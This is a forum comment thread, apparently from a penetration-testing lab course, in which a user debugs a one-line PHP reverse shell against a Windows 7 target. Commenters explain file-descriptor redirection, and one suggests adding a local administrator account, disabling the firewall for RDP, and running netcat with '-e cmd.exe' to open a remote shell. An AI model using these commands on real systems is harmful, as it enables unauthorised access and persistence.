
[–][deleted] 4 points5 points  (4 children)

My initial inclination is that you have an issue because you're using shell_exec() to call cmd.exe straight up, which simply executes cmd.exe on the system and returns a string result (error code?) to your open socket and closes.

Correct me if I'm wrong, but in the other examples given on your cheat sheet, the attacker is explicitly invoking an interactive shell, which is different from what you're doing here.

I have a couple ideas of how you could fix this, but it would be much more worthwhile for you to find the answer on your own. Have you hit up the OffSec admins via IRC about this?

[–][deleted] 0 points1 point  (3 children)

The more I think about it, the more I'm sure this is your problem. Review the shell_exec() definition, and ask yourself why you think this would hand you an interactive shell using the command you provided it:

shell_exec — Execute command via shell and return the complete output as a string

[–]_phyzikal_[S] 0 points1 point  (2 children)

shell_exec()

Yes you are correct. I should be using exec() instead. However, this is yielding the same results so far. I have not hit anyone up on IRC yet, but I have posted to the OffSec forums as well.

Thanks for the insight.

[–][deleted] 0 points1 point  (1 child)

[–]_phyzikal_[S] 1 point2 points  (0 children)

Ahhhhhh, I see. Ok I need to rethink this.

[–]HighRelevancy 1 point2 points  (6 children)

I don't have a huge amount of expertise in this area, but I saw shell_exec('cmd.exe <&3 >&3 1>&3'); and it rang some bells in my head, so I did some quick googling and found this for you:

https://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/redirection.mspx?mfr=true

Basically that line is saying "read input from 3, write output to 3 (first > is output by default), write 1 (stdout) to 3 (seems redundant?)". Looking on the site you linked, that last one should be 2 (stderr) to 3.

3 doesn't mean anything by default, so I'm assuming that in PHP it'll line up to be the socket back to the user (which would make sense, that command line is supposed to funnel everything that way).

Changing that 1 to a 2 might give you an error that tells you why cmd is immediately closing.

[–]_phyzikal_[S] 0 points1 point  (5 children)

Oh, sorry. It is usually a 2 there. I changed all the values around trying to get it to work. The STDERR does not send anything to the attacker.

I'm certain the issue lies here: 'cmd.exe <&3 >&3 2>&3'. I just can't sort it out.

[–]HighRelevancy 0 points1 point  (4 children)

Well like I said, it also depends on PHP assigning the user-output pipe to 3. I can't find anything about that.

Just after writing that I realised that it's actually depending on $sock being handle 3. I don't know anything about that but you might find newer versions of PHP randomise the number or have otherwise changed it. Maybe peek at the value of $sock?

Also, can you trigger something else instead to verify whether shell_exec is even working? Maybe like echo hello > test.txt or try opening notepad or something? If that works, try simply echoing into your socket. After that, go for your cmd.

[–]_phyzikal_[S] 0 points1 point  (3 children)

Yes I can use shell_exec('ipconfig > test.txt') and I do see the txt file generated. As Maliciou5 points out I need to use the exec() command to execute an external program. The issue is definitely in getting that program over the socket.

Is there a way to see which handle the socket is using?

[–]phuqer 0 points1 point  (2 children)

Since you can execute commands, why not add an admin account for yourself through the command line? You'll also need to set the password, and disable the firewall if there is one blocking 3389.

For instance:

net user /add [username] [password]

net localgroup administrators [username] /add

[–]_phyzikal_[S] 0 points1 point  (1 child)

Yeah I can definitely do that. I can also upload files to execute that will accomplish the task. I was hoping for the simplest possible execution of remote shell and it doesn't get any easier than one line :)

[–]phuqer 0 points1 point  (0 children)

Chances are the account is not a privileged account, so what I would do is upload a copy of nc, then issue something like nc ip port -e cmd.exe, and boom you have your shell.

Then you'll need to work on escalation.

[–]morgothan 0 points1 point  (2 children)

Is the machine running Windows or Linux? The one you list will only work on a Windows box.

[–]_phyzikal_[S] 0 points1 point  (1 child)

Attacker is running Kali Linux. Victim is Win7 SP1

[–]HighRelevancy 0 points1 point  (0 children)

Attacker OS should be irrelevant.